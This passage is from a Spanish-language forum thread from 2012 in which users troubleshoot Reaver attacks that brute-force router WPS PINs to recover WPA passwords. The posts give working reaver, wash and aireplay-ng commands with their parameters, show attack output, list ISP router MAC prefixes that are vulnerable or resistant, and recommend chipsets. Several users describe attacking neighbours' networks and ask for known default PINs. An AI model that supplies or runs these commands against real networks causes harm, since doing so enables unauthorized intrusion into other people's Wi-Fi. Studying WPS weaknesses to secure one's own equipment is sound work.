PD: ¿También los TP-Link traen por defecto este PIN? Estoo... si la idea de poner un pin es dar más seguridad, y resulta que un montón de routers traen de fábrica un pin tan absurdo como 12345670, ¿dónde está la seguridad? Es como comprar una caja fuerte y luego dejarla abierta todo el día, para que se ventile...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Moype en 17 Octubre 2012, 19:14 pm
Es precisamente en ese pin en el que esta todo el rata, ya no se si es que no funcionaba o es que ese es el pin.

Nunca he intentado decirle el pin a intentar, también te digo que si que se asocia correctamente pero....

El otro router es mac 00:22:2D:XX:XX:XX y todo ok pero me vuelve a salir el mismo aviso y no avanza el %.

Voy a probar y pongo el resultado.
Muchas gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 17 Octubre 2012, 19:46 pm
Pero,¿has conseguido la asociación?,si no es así,nunca podrá subir el porcentaje ya que no "recibe" la petición del pin....o eso,o estás muy lejos del ap y se pierden los paquetes por "ahí"...aunque quuizá estoy confundido....
Hay otros routers que ni se asocian,ni se puede hacer nada y se puede tirar lanzando intentos en un bucle infinito...no lo puedo afirmar porque no tengo tanta paciencia para ver si se bloquea o por el contrario continúa lanzando el primer pin...
A ver cuando inventan el comando que active el wps xd :xD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Moype en 17 Octubre 2012, 22:43 pm
Si si que se asocia, pero como siempre intenta elmismo pin, esa era mi duda si estaba haciendo algo mal o... No tengo suficiente paciencia, cuando lo vuelva a intentar posiblemente mañana hago una foto y la subo para que me ayudeis.

Muchas gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: AnonDraven en 18 Octubre 2012, 02:06 am
Elsevi, te aseguro que esos routers el reaver no es capaz de incurrir.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 18 Octubre 2012, 02:15 am

PD: ¿También los TP-Link traen por defecto este PIN? Estoo... si la idea de poner un pin es dar más seguridad, y resulta que un montón de routers traen de fábrica un pin tan absurdo como 12345670, ¿dónde está la seguridad? Es como comprar una caja fuerte y luego dejarla abierta todo el día, para que se ventile...


No, solamente el TP-Link TL-WA7510N, CPE de Exterior en 5.8GHz.



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 18 Octubre 2012, 10:41 am
Buenas...
Tengo Broadcom 4313 hay algo nuevo en reaver para este chipset... Lo tengo toda la noche con el comando reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv y no pasa del 4%....

Por otra parte en mi movil cuando me voy a conectar a una red con WPS me da la opción que pone "PIN DE WPS" le doy y me dice "Pulse iniciar en 2 minutos en introducir el PIN en el punto de acceso WI-Fi XXXXXXXX" esto para que es? No creo que sea el PIN sería demasiado facil... Cada vez pone un numero diferente.

Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Seaworth en 18 Octubre 2012, 12:57 pm
No, solamente el TP-Link TL-WA7510N, CPE de Exterior en 5.8GHz.


Sí, a eso me refería (me olvidé de poner el modelo con las prisas...).

Gracias.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 18 Octubre 2012, 16:30 pm
Hola buenas de nuevo a mi la WLAN_E6A0 LA MAC : D0:AE:EC:XX:XX:XX nunca se me asocia que raro tengo otra parecida a esta que es asin WLAN_E6A0_XT Una de esta si tiene el wps acitvado con cliente conectado y otra no resulta que yo le he atacado a las dos y se asocia nunca por que sera es raro a mi casi siempre se me asocian aunque te el wps desactivado se me asocia en algunas en estas demomento no.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 19 Octubre 2012, 02:39 am
@maik78: las Broadcom no tienen soporte.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: davidtuti en 19 Octubre 2012, 09:50 am
Hola,
Estoy intentando hacer reaver a una F4:3E:61

Sabéis si estas tienen algun problema?
Es que se me queda en "Sending identity response" siempre.  :-\

Gracias y saludos,



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: fjarias en 19 Octubre 2012, 11:36 am
Wenas, se me keda en reaver 1.4 con wifiway en un 99,99% de mi red con bssid 8C:0C:A3:xx:xx:xx con chisep atheros ar9285, que puedo hacer?? Al quedarse en el 99,99% enpieza a probar siempre el mismo pin, saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: PacoA en 19 Octubre 2012, 19:25 pm
Hola... me leído casi todo el hilo... y por lo que veo los routers de Orange 00:19:70 son invulnerables.

Simplemente quería confirmarlo. ¿hay alguna noticia nueva?

Un abrazo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: beholdthe en 19 Octubre 2012, 23:04 pm
Hace tiempo que no leo este hilo, así que perdonarme si digo algo que ya esta hablado.
Quería preguntar si el ataque por REAVER sigue siendo efectivo, o por el contrario las compañias han parcheado esta vulnerabilidad en los routers?

Digo esto porque tengo varios routers (los mas viejos no traen WPS como es logico) y 2 de ellos cuando salio dicha vulnerabilidad, pude atacarlos sin problemas.
El caso es que ahora intente probar el REAVER PRO, el cual desde mi punto de vista (aunque igual estoy equivocado) es una estupidez porque no hace nada que no puedas hacer con el REAVER normal utilizando CÓDIGO que es como se deberían hacer este tipo de cosas, mas bien para evitar el uso masivo de ESTÚPIDOS NIÑATOS con ganas de joder a sus vecinos.
Al grano...   He intentado atacar de nuevo mis routers y nada, no hay manera, o no asocia, o no prueba pings, etc. Probe con mi querido BACKTRACK y lo mismo.
Pero ahí no queda la cosa, si no que en casa de un familiar al cual le desactive hace tiempo el WPS para protegerle su red (el cual tambien era vulnerable) tampoco funciono.
Como es posible que antes funcionara todo perfecto y ahora no?
La respuesta es lo que pregunte antes...  ¿Han solucionado esto y ahora el REAVER ya no sirve?
Incluso probe a ponerle el ping 12345670 que es el que primero prueba y nada, lo prueba, se queda todo el rato probandolo, pero no hace nada.

Gracias por las respuestas y perdonar si ya esta comentado.

P.D: Me interesan mas las opiniones de gente de España, por si en otros países la situación es distinta.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 19 Octubre 2012, 23:14 pm
Wenas, se me keda en reaver 1.4 con wifiway en un 99,99% de mi red con bssid 8C:0C:A3:xx:xx:xx con chisep atheros ar9285, que puedo hacer?? Al quedarse en el 99,99% enpieza a probar siempre el mismo pin, saludos

Ese router, lo he auditado yo varias veces, en varias momentos del día, con distintos parámetros, y siempre se me quedó al 99,99%, yo pienso que ya es tiempo suficiente para hacer una lista de routers invulnerables, dentro de los cuales está esa especie de hueso irroible para el reaver, el 8C:0C:A3:XX:XX:XX, del resto poco sé por no decir nada. :huh:
Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Octubre 2012, 01:25 am
@fjarias: Leete las 47 paginas de este hilo y entérate.. 500 veces se hablo ya.

@beholdthe: de la única que me entere es TP-Link pero es pésimo ese parche, no cambia en nada sigue atacando igual solo un cacho mas lento y aparte ni siquiera lo dejan deshabilitado por defecto. ESTÚPIDOS NIÑATOS recalco.

@capitanfanegas: nada es imposible falta alguien que tenga ganas.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Moype en 20 Octubre 2012, 03:16 am
Nada no hay manera... La mac del router es 80:B6:86:XX:XX:XX se asocia pero siempre intenta el mismo pin 12345670 y siempre sale el mismo aviso
WARNONG: Recibe timeout occurred
Asi 25 veces y vuelta a empezar, mientras tanto 0%

Agradecería una ayuda o que pruebe comandos que me digáis


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 20 Octubre 2012, 10:03 am
Los routers de orange tipo 5C:33:8E........,00:19:70.....,C0:AC:54.....,te permiten asociarte,pero finalmente se bloquean durante x tiempo.
Los de vodafone tipo 62:C0:6F.....son "atacables"....al menos con la alfa awuso36h.

Por otra parte,después de ver que reaver no tiene soporte para ralink 3070,me he ido a por wifiway 2.0.1 porque teóricamente sí que soporta este chip con inyección incluída.....pero no es así,al menos con esta antena que me han regalado,una BLUEWAY BT030 de 9 db....un disparo para navegar,pero no inyecta ni con beini(que ya es decir) ni manualmente por consola eligiendo un ap concreto....pues bien,al hacer un iwconfig con xubuntu me dice que es RT2870 y wifiway me dice que es rt2800....en fin ,un caos....¿alguien conoce el método o un link que me permita parchear este chipset(si es que existe)?
También me gustaría saber la razón por la que distintas distros marcan distintos chipset...lo que es SEGURO es que ninguno de ellos es válido para inyectar con esta antena y en algunos(probándola en diferentes distros) casos ni se pone en modo monitor.
¿Puede ser por ser de tecnología N? Con antenas a/B/G no me he encontrado esta curiosa situación....y ando trasteando desde 2007(empezé con BT3,wlandecrypter y wepattack,cuando una wpa era algo ocasional) con antenas de TODO tipo vía usb,de hecho tengo al menos 10 antenas...conceptronic,alfa,tp link,d-link,intel ipw2200(esta en el portatil),y alguna mas que ni recuerdo la marca.

Menos mal que ha sido un regalo la antena,porque para auditar no me sirve....pero para navegar es tremenda.... por si os sirve de información.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: fjarias en 20 Octubre 2012, 16:15 pm
@fjarias: Leete las 47 paginas de este hilo y entérate.. 500 veces se hablo ya.

@beholdthe: de la única que me entere es TP-Link pero es pésimo ese parche, no cambia en nada sigue atacando igual solo un cacho mas lento y aparte ni siquiera lo dejan deshabilitado por defecto. ESTÚPIDOS NIÑATOS recalco.

@capitanfanegas: nada es imposible falta alguien que tenga ganas.

Hola, he leido y he hecho lo esto que es lo que ponia:

reaver -i mon0 -b xx:xx:xx:xx:xx:xx -p xxxx -vv

Pero nada, me da el mismo error, como lo soluciono?? saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 8carlos88 en 20 Octubre 2012, 18:27 pm
hola

adrihamel puedes pasarme el pin de vodafone 5C:4C:A9???
aqui pillo una de esas y te mande un privado pero no se ti llego.

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 20 Octubre 2012, 18:59 pm
Buenas,

antes de nada soy nuevo escribiendo, aunque hace tiempo que isgo el foro, siemrpe he tenido de sobra con las wep , pero me he decidido investigar un poco mas con las wpa2.

he estado trasteando un poco el wifiway3.4, pero tengo unos problemillas os comento a ver... deciros que uso una alfa que va muy bien para esto, como ya sabreis.

1º el Walsh 1.4 no me encuentra ninguna red, he leido que con el wifisalh no funciona bien supongo que es por eso...

2º he hecho el metodo de wireshark para comprobar lo de wps, dice que busque en broadcast... he mirado y si mesale lo de WPS... pero como se que es de la red que yo quiero..?

3º ya sobre el reaver... cuando lleva el 0.50 %(10 minutos) o asi... se me queda parado , no avanza ... la red tiene señal a tope. ¿por que peude ser?

4º cuando aborto y vuelvo a ejecutar no me da la opcion de seguir por donde me quedde aunque cuando aborto pone sesion guardada.

saludos y espero haber sido claro.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 20 Octubre 2012, 22:59 pm
@8carlos88: el privadito no ayuda a nadie.

@robeiniesta90: 1.- Has usado el verificador de WPS de WPSCrackGUI? 2.- Es una m3rd ese método. 3.- Se lleno la memoria del router o simplemente no responde. 4.- Mal instalado el reaver.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 21 Octubre 2012, 19:48 pm
@8carlos88: el privadito no ayuda a nadie.

@robeiniesta90: 1.- Has usado el verificador de WPS de WPSCrackGUI? 2.- Es una m3rd ese método. 3.- Se lleno la memoria del router o simplemente no responde. 4.- Mal instalado el reaver.

1. No, use el wireshark.

3. Ayer probe a ponerle mas retardo pero nada, igual, quizas aguante un poco mas al 0.60 % y se para, pero no me dice nada de que el router este bloqueado ni ningun mensaje raro...

4. a lo mejores porque es livecd... intentaré mediante maquina virtual..

gracias por contestar.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 8carlos88 en 21 Octubre 2012, 23:10 pm
@8carlos88: el privadito no ayuda

hola lo pedia x privado para incumlir las normas...pero si puede pedir y lo tiene alguien y quiere poner aki se lo agredeceria.


Un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jechu85 en 22 Octubre 2012, 09:52 am
Hola estoy usando reaver y cuando llega al 90,90% se queda siempre probando el mismo pin y no cambia, lo he intentado dos veces y siempre se queda en el mismo porcentaje y en las dos veces con pins diferentes. He leido en varios foros pero no consigo dar con la solucion. ¿alguien me puede ayudar?. uso el codigo este, que lo compartio el compañero wfcron y me ha ido muy bien:

reaver -i mon0 -b 64:16:F0:XX.XX:Xx -c 6 -a -v -S -x 20 -r 100:10 -l 300

mi router es un  vodafone y lo tengo a unos 6, 7 metros del ordenador, pero siempre que llega al 90,90% me sale esto:

Trying pin 39355676
Sending EAPOL START request
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending identity response
Sending M2 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M2D message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending WSC ACK
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 21 (0x15), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Got packet type 19 (0x13), but haven't broken the first half of the pin yet!
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Last message not processed properly, reverting state to previous message
[!] WARNING: Out of order packet received, re-trasmitting last message
Sending M6 message
[!] WARNING: Receive timeout occurred


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: fjarias en 23 Octubre 2012, 11:47 am
bueas, pues he vuelto a probar con reaver 1.4 y una red con el mismo bssid 8C:0C:A3 y me da el mismo error, se queda al 99,99% probando el mismo pin, que puedo hacer? muchas gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: John_Ganissa en 23 Octubre 2012, 14:03 pm
a mi me da error de asociacion, como se soluciona? me he leido todo el post i nada...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 23 Octubre 2012, 18:03 pm
bueas, pues he vuelto a probar con reaver 1.4 y una red con el mismo bssid 8C:0C:A3 y me da el mismo error, se queda al 99,99% probando el mismo pin, que puedo hacer? muchas gracias

Con un router del mismo pelaje estoy probando yo el reaver 1.3, en el wifislax 4.2, a ver que es lo que me depara, porque con el 1.4 he obtenido el mismo resultado 99.99%, probando el mismo pin, va despacito despaciiitooo, en cuánto tenga algo, lo comunico por aquí  :¬¬saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: pelomher en 24 Octubre 2012, 11:43 am
Despues de varias horas, reaver se queda asi indefinidamente

  • Waiting for beacon from 20:2B:C1:XX:XX:XX
  • Associated with 20:2B:C1:XX:XX:XX (ESSID: FTE-XXXX)
  • 99.99% complete @ 2012-10-21 22:36:06 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:36:40 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:37:14 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:37:55 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:38:39 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:39:26 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:40:00 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:40:47 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:42:05 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:42:52 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:43:43 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:44:37 (0 seconds/pin)
  • 99.99% complete @ 2012-10-21 22:45:41 (0 seconds/pin)
¿Alguien tiene alguna sugerencia?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: liena en 24 Octubre 2012, 23:31 pm
¿A alguien le funcionó el Reaver con alguna vodafonexxxx 00:25:68?

Yo probé con una Atheros AR9285

Me ha parecido entender que:
- No se necesitan estaciones conectadas al AP
- No es necesario captura paquetes, ni handsakes.

En fin, mi tarjeta se asocia, pwr -80  y RXQ 100


Aunque va soltando diferentes PINs, y va aumentando el %, me salen multitud de warnigs y abundantes timeouts. Envia mensajes M2,  M2D y WSC ACK

La gran duda que se me ocurre es la siguiente:

Cuando se lanza un PIN incorrecto ¿Como puede saber reaver si el AP no le responde porque el PIN no es correcto o porque, simplemente, no le ha oído bien? (no hay buena señal o se dan interferencias puntuales) Ya que en este caso reaver se podría pasar el PIN correcto al no tener respuesta, y seguir con su lista sin encontrarlo.

Simplificando ¿El router responde pin incorrecto, o simplemente no responde? (Que es lo usual en temas de passwords, es decir, se suele no decir que pasa para no dar información al atacante)

Bueno, si alguien es tan amable.....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: 8carlos88 en 25 Octubre 2012, 12:56 pm
hola tras pasarme un pin para vodafone 5c:4c:a9 me sale directamente un 90,91% y despues:

warning 10 failed connections in a row

y asi sigue todo el rato.

un saludo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: robeiniesta90 en 27 Octubre 2012, 08:59 am
buenas,

Mi vodafoneXXXX con MAC  28:5F:DB .... no hay manera...

el router es un huawei

alguien ha podido de ese tipo?

saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 28 Octubre 2012, 23:58 pm
todos los problemas que están teniendo son principalmente por usar chipset con escasa compatibilidad, si no tienes un AR9271 o un RTL8187, el 90% de los ataque que realices no funcionaran... AR9285.. Broadcom.. RT3070.. RT28XX...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: liena en 29 Octubre 2012, 21:17 pm
todos los problemas que están teniendo son principalmente por usar chipset con escasa compatibilidad, si no tienes un AR9271 o un RTL8187, el 90% de los ataque que realices no funcionaran... AR9285.. Broadcom.. RT3070.. RT28XX...

¿Con ello quieres decir que el Reaver tiene su propia lista de compatibilidad de chipsets?

Bueno he visto esto en el post inicial de Chimo:


Supported
The following wireless drivers have been tested or reported to work successfully with Reaver:

  • ath9k
  • rtl8187
  • carl19170
  • ipw2000
  • rt2800pci
  • rt73usb
Partially Supported
The following wireless drivers have had mixed success, and may or may not work depending on your wireless card (i.e., if you are having problems with these drivers/cards, consider trying a new card before submitting a trouble ticket):

  • ath5k
  • iwlagn
  • rtl2800usb (using the latest compat-wireless drivers has fixed many user's problems, hint hint...)
  • b43
Not Supported
The following wireless drivers/cards have been tested or reported to not work properly with Reaver:

  • iwl4965
  • RT3070L
  • Netgear WG111v3

La AR9271 que mencionas no sale en la lista.

Mi AR9285 se pone en modo monitor desde wifiway 2.0, o 3.4, y puede inyectar bajo la suit aircrack-ng, que incorporan dichas distribuciones.

Por curiosidad, ¿Tienes idea de porqué el Reaver no es compatible con los drivers? es decir, ¿que hace Reaver con las tarjetas que no haga Aircrack?

Y sobre todo gracias por tus continuas aportaciones  P4nd3m0n1um, que veo que este hilo lo cargas a tu espalda.

Saludos,


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 30 Octubre 2012, 03:00 am
¿Con ello quieres decir que el Reaver tiene su propia lista de compatibilidad de chipsets?

 ;-) ;-) ;-) ;-) ;-)

Bueno he visto esto en el post inicial de Chimo:

La AR9271 que mencionas no sale en la lista.

pues hay todo un hilo para leer en el google code de reaver-wps:

(http://i.minus.com/iK5FPZZNYoujE.PNG)

(http://i.minus.com/ib0Por4cNgGxup.PNG)

(http://i.minus.com/ilLBclo5y21sq.PNG)

(http://i.minus.com/ibxfS31CUdhA6Z.PNG)

Mi AR9285 se pone en modo monitor desde wifiway 2.0, o 3.4, y puede inyectar bajo la suit aircrack-ng, que incorporan dichas distribuciones.

cosa que no tiene nada que ver con el protocolo WPS..

(http://i.minus.com/iKxFFcqyPOOfp.PNG)

Por curiosidad, ¿Tienes idea de porqué el Reaver no es compatible con los drivers? es decir, ¿que hace Reaver con las tarjetas que no haga Aircrack?

porque los chipsets como RT3070/RTXXXX son todos genéricos y funcionan para el traste, los creadores no le dan soporte y si encuentras un driver que funcione es suerte, como el RTL8192SE. Es decir, que tiene que ver el Reaver con el AirCrack?



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 30 Octubre 2012, 15:26 pm
Buenas, traigo una instantänea del Reaver, en este caso 1.3, estrelländose contra el router archiconocido de timofonica:

(http://img5.imageshack.us/img5/1050/instantanea2.png)

Todo esto dentro del wifislax 4.2, de nuevo el dichoso bucle del 99.99%. :silbar:
Del 73% salto al 90.94%, con los digitos 9568, parece que detecta los 4primeros digitos pero se pierde en los 4 ultimos.
Los parämetros fueron:
Código:
reaver -i mon0 -b 8C:0C:A3:XX:XX:XX  -a  -S -r 100:10 -l 300  -d 5 -vv

Perdon por los acentos pero se me ha desvariado el teclado, no lo he arreglado aun.

Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: maik78 en 30 Octubre 2012, 19:15 pm
Buenas....
Teniendo en cuenta lo que P4nd3m0n1um dice de las Broadcom y otros chipset incompatibles....
Alguién me puede decir si con un USB wireless con el chipset AR9271 o un RTL8187, podría funcionar el reaver o por ser un USB no funcionara....

Por otra parte se sabe si en siguiente versiones de reaver habrá alguna mejora sobre los chipset compatibles.

Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 31 Octubre 2012, 00:07 am
Buenas....
Teniendo en cuenta lo que P4nd3m0n1um dice de las Broadcom y otros chipset incompatibles....
Alguién me puede decir si con un USB wireless con el chipset AR9271 o un RTL8187, podría funcionar el reaver o por ser un USB no funcionara....

Por otra parte se sabe si en siguiente versiones de reaver habrá alguna mejora sobre los chipset compatibles.

Saludos

Las internas no funcionan, las USB por ejemplo una TP-Link TL-WN722N (AR9271) funciona tantito mejor que una Alfa Network AWUS036H (RTL8187L), la compatibilidad no la da reaver, la da el driver que uses.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 31 Octubre 2012, 11:48 am
Buenas....
Teniendo en cuenta lo que P4nd3m0n1um dice de las Broadcom y otros chipset incompatibles....
Alguién me puede decir si con un USB wireless con el chipset AR9271 o un RTL8187, podría funcionar el reaver o por ser un USB no funcionara....

Por otra parte se sabe si en siguiente versiones de reaver habrá alguna mejora sobre los chipset compatibles.

Saludos
Perfectamente...es mas,diría que funcionan mejor que las integradas...la alfa awuso36h rula óptimamente vía usb,la tp-link WN 721N también ...y alguna más que tengo que funcionan bien con reaver 1.4...y otras que no son compatibles con reaver pero que permiten inyectar,deautenticar para capturar el handshake,etc,etc,etc....también añadir que la vieja ipw2200 de mi portátil también rula(es integrada....eso sí,reaver lo hago rular directamente desde xubuntu 10.10,no con las distros que lo traen por "defecto"...)

Respondiendo a capitanfanegas...¿no es demasiado tiempo para obtener la respuesta en un pin?quiza 15-16 segundos por pin es indicativo de que o bien tu antena no es muy potente o el router te pilla un pelín retirado....y quizás se pierden los paquetes....aunque no puedo afirmarlo, pero en los intentos que he hecho con éxito el pin no se demoraba tanto,3-4 ó 5 sg como mucho....
Por otra parte,si no pilla un pin,se demora en un bucle infinito hasta que obtiene respuesta reaver...o al menos eso me ocurre a mí,aunque no he tenido la paciencia de ver en qué termina el bucle(si es que termina)....cuando lo pilla correctamente te tira hasta 7 mensajes M7

(http://imageshack.us/a/img222/2763/vodafonexxxx.png)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: capitanfanegas en 31 Octubre 2012, 14:06 pm
Gracias por tu respuesta, malamadre67 ¿Podrías poner también todos los parámetros? De todas formas he intentado ahora haciendo la asociación con aireplay-ng
Código:
aireplay-ng -1 30 -a -h -e mon0
Por otra terminal lanzo el  reaver con la opción A para que no realice asociación:
Código:
reaver -i mon0 -b 8c:0c:a3:xx:xx:xx -A -c x -d 0 -vv
Y  me aparece un error: "Got a deauthentication packet ! (Waiting 3 seconds)", en la terminal del aireplay-ng, claro, va asociando y desasociando, continuamente, quizá esa es la explicación por la que se demoran o retrasan tanto los intentos de pin, suponiendo yo, que tampoco es algo que esté afirmando rotundamente. En cuanto a la señal es variable, con una rtl8187, 1000mW,  signal 55-59 PWR ¿No sé si es una señal aceptable para testear con el reaver? Pero ya digo yo que estos routers tienen alguna medida adicional de seguridad.
 :huh:


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Mc_Roy en 31 Octubre 2012, 15:09 pm
@P4nd3m0n1um Que adaptador USB me recomiendas entonces para comprar para reaver/auditar???

Un TP-Link TL-WN722N es lo que mejor funcionaria??
Graaaaaaacias  ;-) ;-)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 31 Octubre 2012, 21:06 pm
Gracias por tu respuesta, malamadre67 ¿Podrías poner también todos los parámetros? De todas formas he intentado ahora haciendo la asociación con aireplay-ng
Código:
aireplay-ng -1 30 -a -h -e mon0
Por otra terminal lanzo el  reaver con la opción A para que no realice asociación:
Código:
reaver -i mon0 -b 8c:0c:a3:xx:xx:xx -A -c x -d 0 -vv
Y  me aparece un error: "Got a deauthentication packet ! (Waiting 3 seconds)", en la terminal del aireplay-ng, claro, va asociando y desasociando, continuamente, quizá esa es la explicación por la que se demoran o retrasan tanto los intentos de pin, suponiendo yo, que tampoco es algo que esté afirmando rotundamente. En cuanto a la señal es variable, con una rtl8187, 1000mW,  signal 55-59 PWR ¿No sé si es una señal aceptable para testear con el reaver? Pero ya digo yo que estos routers tienen alguna medida adicional de seguridad.
 :huh:

Aireplay no es necesario lanzarlo al usar reaver....se supone ya lo hace "por defecto" si el router lo permite,claro está....otra cosa es que estés intentando inyectar tráfico o cualquier método para obtener datas o un handshake),lo cual no tiene nada que ver con REAVER.,ya que éste ataca a través del pin y no de la contraseña wpa...(o eso creo
En este caso,se asocia con uno de orange correctamente....lo cual no significa nada más que eso,que estás asociado.
Respondiendo a qué comando he utilizado...pues el más genérico de todos,como verás en la captura de pantalla

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/orange.png)

También es cierto que con otros routers,como este de timofónica,ha sido coser y cantar,en apenas 12 segundos me tiró pin y contraseña....pero porque forma parte de la lista de routers "vulnerables" por wps.

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/copiadewlanxxxx.png)

Con este otro de vodafone también se tiró lo suyo,más de 11.000 segundos....en la otra captura que puse en un mensaje anterior otro vodafone con más de 24.000 segundos para obtener la key y el pin.

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/vodafone7XXX.png)

Lógicamente ha sido cuestión de suerte(que el vecindario use estos routers) y de dar con AP's vulnerables.Con muchos otros me he encontrado con que se bloquea el ap y fin del asunto.
Pero antes utilizo la herramienta wash que proporciona reaver para saber qué ap's son susceptibles de ser atacados....

(http://i1156.photobucket.com/albums/p567/bassllekano/SOFTWARE/copiadewash.png)

Los "parámetros" que pedía capitanfanegas están en las mismas capturas...lo más genérico que hay y que están más que posteados en este hilo

# sudo wash  -i mon0 -C     //para lanzar wash
# sudo reaver -i mon0 -b  BSSID víctima -vv      //para lanzar reaver

Sólo un apunte,en mi caso mon0 es mi interfaz...según chipset puede ser wlan,eth,etc.....

En todos ellos,utilizé antenas con chip rtl8187....


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 31 Octubre 2012, 22:23 pm
Las telefonica 8C:0C:A3 dicen que son vulnerables por que uno de lamiweb lo ha conseguido en 48 horas con el wifislax 4.2 con la herramienta wpscrakgui que trae probar haber en el wifislax este que es ultima version y la herramienta saludos suerte


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 1 Noviembre 2012, 00:35 am
Perfectamente...es mas,diría que funcionan mejor que las integradas...

Cuantas probaste para decir eso? 1..  :xD



Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 1 Noviembre 2012, 09:06 am
Cuantas probaste para decir eso? 1..  :xD



